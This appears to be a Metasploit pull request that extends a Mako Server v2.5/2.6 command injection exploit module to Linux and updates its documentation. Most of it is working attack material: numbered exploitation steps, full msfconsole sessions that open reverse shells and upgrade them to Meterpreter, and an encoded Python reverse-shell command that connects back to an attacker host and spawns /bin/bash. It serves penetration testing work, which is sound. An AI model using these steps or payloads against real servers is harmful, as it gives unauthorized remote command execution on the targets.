### PR TITLE
Add Mako Server CMD injection Linux support, update docs, move to multi

### DIFF
--- a/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md
+++ b/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md
@@ -1,6 +1,6 @@
 ## Description
 
-  This module exploits a vulnerability found in Mako Server v2.5.
+  This module exploits a vulnerability found in Mako Server v2.5, 2.6.
   It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.
 
   Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391
@@ -9,33 +9,48 @@
 
   [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications.
 
-  This module has been verified against the following Mako Server versions for Windows XP SP3 and Windows 7 SP1 (x86/x64):
+  This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS:
   - v2.5
+  - v2.6
 
   Links:
-  - [Windows installer](https://makoserver.net/download/mako.windows.x86.exe)
+  - [Windows x86 installer](https://makoserver.net/download/mako.windows.x86.exe)
   - [Windows download page](https://makoserver.net/download/windows)
-  - [Documentation](https://makoserver.net/documentation/manual/)
+  - [Linux x64 installer](https://makoserver.net/download/mako.linux-x64.tar.gz)
+  - [Linux download page](https://makoserver.net/download/linux-x86)
+  - [Documentation](https://makoserver.net/download/manual)
 
 ## References for vulnerability
   - https://blogs.securiteam.com/index.php/archives/3391
   - https://www.exploit-db.com/exploits/42683
 
-## Verification Steps
+## Verification Steps for Windows
 
   1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work)
   2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop
-  3. Start msfconsole on host
-  4. Do: ```use exploit/windows/http/makoserver_cmd_exec```
-  5. Do: ```set RHOST <IP address of target system>```
-  6. Do: ```set PAYLOAD cmd/windows/reverse_powershell```
-  7. Do: ```set LHOST <IP address of host system>```
-  8. Do: ```exploit```
-  9. You should get a Windows command shell
+  4. Start msfconsole on host
+  5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
+  6. Do: ```set RHOST <IP address of target system>```
+  7. Do: ```set PAYLOAD cmd/windows/reverse_powershell```
+  8. Do: ```set LHOST <IP address of host system>```
+  9. Do: ```exploit```
+  10. You should get a Windows command shell
+
+## Verification Steps for Linux
+
+  1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work)
+  2. From inside the extracted folder, do ```./rundemo.sh```
+  4. Start msfconsole on host
+  5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
+  6. Do: ```set RHOST <IP address of target system>```
+  7. Do: ```set PAYLOAD cmd/unix/python_reverse```
+  8. Do: ```set LHOST <IP address of host system>```
+  9. Do: ```exploit```
+  10. You should get a Linux command shell (may need to wait ~30 seconds)
 
 ## Example Output
 ```
-msf > use exploit/windows/http/makoserver_cmd_exec 
+msf > use exploit/multi/http/makoserver_cmd_exec 
 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
 RHOST => 10.10.10.3
 msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
@@ -57,7 +72,7 @@ C:\Users\Smith\Downloads\MakoServer>
 
 ## Example Verbose Output
 ```
-msf > use exploit/windows/http/makoserver_cmd_exec 
+msf > use exploit/multi/http/makoserver_cmd_exec 
 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
 RHOST => 10.10.10.3
 msf exploit(makoserver_cmd_exec) > set VERBOSE true
@@ -94,7 +109,7 @@ C:\Users\Smith\Downloads\MakoServer>
   A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session:
 
   ```
-  msf > use exploit/windows/http/makoserver_cmd_exec 
+  msf > use exploit/multi/http/makoserver_cmd_exec 
   msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
   RHOST => 10.10.10.2
   msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
@@ -160,4 +175,77 @@ C:\Users\Smith\Downloads\MakoServer>
   Domain          : WORKGROUP
   Logged On Users : 2
   Meterpreter     : x86/windows
+  ```
+
+### Targeting Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5
+
+  A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session:
+
+  ```
+  msf > use exploit/multi/http/makoserver_cmd_exec 
+  msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
+  RHOST => 10.10.10.2
+  msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python
+  PAYLOAD => cmd/unix/reverse_python
+  msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
+  LHOST => 10.10.10.4
+  msf exploit(makoserver_cmd_exec) > check
+  [*] 10.10.10.2:80 The target appears to be vulnerable.
+  msf exploit(makoserver_cmd_exec) > exploit
+
+  [*] Started reverse TCP handler on 10.10.10.4:4444 
+  [*] Sending payload to target...
+  [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500
+
+  ls
+  LICENSE.txt
+  mako
+  mako.zip
+  README.txt
+  rundemo.sh
+  tutorial
+  ^Z
+  Background session 1? [y/N]  y
+  msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
+  msf post(shell_to_meterpreter) > sessions -l
+
+  Active sessions
+  ===============
+
+    Id  Name  Type            Information  Connection
+    --  ----  ----            -----------  ----------
+    1         shell cmd/unix               10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
+
+  msf post(shell_to_meterpreter) > set SESSION 1
+  SESSION => 1
+  msf post(shell_to_meterpreter) > set LPORT 8080
+  LPORT => 8080
+  msf post(shell_to_meterpreter) > exploit
+
+  [*] Upgrading session ID: 1
+  [*] Starting exploit/multi/handler
+  [*] Started reverse TCP handler on 10.10.10.4:8080 
+  [*] Sending stage (847604 bytes) to 10.10.10.2
+  [*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500
+  [*] Command stager progress: 100.00% (736/736 bytes)
+  [*] Post module execution completed
+  msf post(shell_to_meterpreter) > sessions -l
+
+  Active sessions
+  ===============
+
+    Id  Name  Type                   Information                                            Connection
+    --  ----  ----                   -----------                                            ----------
+    1         shell cmd/unix                                                                10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
+    2         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2  10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2)
+  msf post(shell_to_meterpreter) > sessions -i 2
+  [*] Starting interaction with 2...
+
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > sysinfo
+  Computer     : 10.10.10.2
+  OS           : Ubuntu 16.04 (Linux 4.10.0-35-generic)
+  Architecture : x64
+  Meterpreter  : x86/linux
   ```

--- a/modules/exploits/multi/http/makoserver_cmd_exec.rb
+++ b/modules/exploits/multi/http/makoserver_cmd_exec.rb
@@ -10,9 +10,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Mako Server v2.5 OS Command Injection RCE',
+      'Name'           => 'Mako Server v2.5, 2.6 OS Command Injection RCE',
       'Description'    => %q{
-        This module exploits a vulnerability found in Mako Server v2.5.
+        This module exploits a vulnerability found in Mako Server v2.5, 2.6.
         It's possible to inject arbitrary OS commands in the Mako Server
         tutorial page through a PUT request to save.lsp.
 
@@ -31,10 +31,10 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://blogs.securiteam.com/index.php/archives/3391']
         ],
       'Arch'           => ARCH_CMD,
-      'Platform'       => 'win',
+      'Platform' => %w[win unix],
       'Targets'        =>
         [
-          ['Mako Server v2.5 - Windows x86/x64', { }]
+          ['Mako Server v2.5, 2.6', {}]
         ],
       'DefaultTarget'  => 0,
       'Privileged'     => false,


### PR DESCRIPTION
Adds support for Linux command payloads such as `cmd/unix/python_reverse` by including "unix" in the "Platform" section (to resolve #9192) and updates the documentation to reflect this support.

Also includes minor edits to show support for v2.6 of Mako Server and moves the module/documentation to the "multi" folder as this module is now multi platform.

- Linux download page: https://makoserver.net/download/linux-x86/
- Linux 64-bit installer direct link: https://makoserver.net/download/mako.linux-x64.tar.gz
- Tested on: Linux Ubuntu 16.04 LTS (x64) with Mako Server version 2.5

![makoserver-linux-support](https://i.imgur.com/rGRX2xB.png)

## Verification
- [ ] Extract the "mako.linux-x64.tar.gz" archive file on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work)
- [ ] From inside the extracted folder, do `./rundemo.sh`
- [ ] Start msfconsole on host
- [ ] `use exploit/multi/http/makoserver_cmd_exec`
- [ ] `set RHOST <IP address of target system>`
- [ ] `set PAYLOAD cmd/unix/python_reverse`
- [ ] `set LHOST <IP address of host system>`
- [ ] `exploit`
- [ ] You should get a Linux command shell (may need to wait ~30 seconds before shell responds)

## Documentation
https://github.com/shogunlab/metasploit-framework/blob/makoserver_linux_support/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md

## Example Output
```
msf > use exploit/multi/http/makoserver_cmd_exec 
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
RHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
LHOST => 10.10.10.4
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.4:4444 
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57884) at 2017-11-10 15:45:18 -0500

ls
LICENSE.txt
mako
mako.zip
README.txt
rundemo.sh
tutorial

```

## Example Verbose Output
```
msf > use exploit/multi/http/makoserver_cmd_exec 
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
RHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > set VERBOSE true
VERBOSE => true
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
LHOST => 10.10.10.4
msf exploit(makoserver_cmd_exec) > check

[*] Trying to detect running Mako Server and necessary files...
[*] Mako Server save.lsp returns correct ouput.
[*] 10.10.10.2:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.4:4444 
[*] Sending payload to target...
[*] Now executing the following command: os.execute([[python -c "exec('aW1wb3J0IHNvY2tldCAsICAgICBzdWJwcm9jZXNzICwgICAgIG9zICAgOyAgICAgIGhvc3Q9IjEwLjEwLjEwLjQiICAgOyAgICAgIHBvcnQ9NDQ0NCAgIDsgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgLCAgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgIDsgICAgICBzLmNvbm5lY3QoKGhvc3QgLCAgICAgcG9ydCkpICAgOyAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAsICAgICAwKSAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgLCAgICAgMSkgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICwgICAgIDIpICAgOyAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"]])
[*] Sending PUT request to save.lsp...
[*] Sending GET request to manage.lsp...
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57886) at 2017-11-10 15:48:12 -0500

ls
LICENSE.txt
mako
mako.zip
README.txt
rundemo.sh
tutorial

```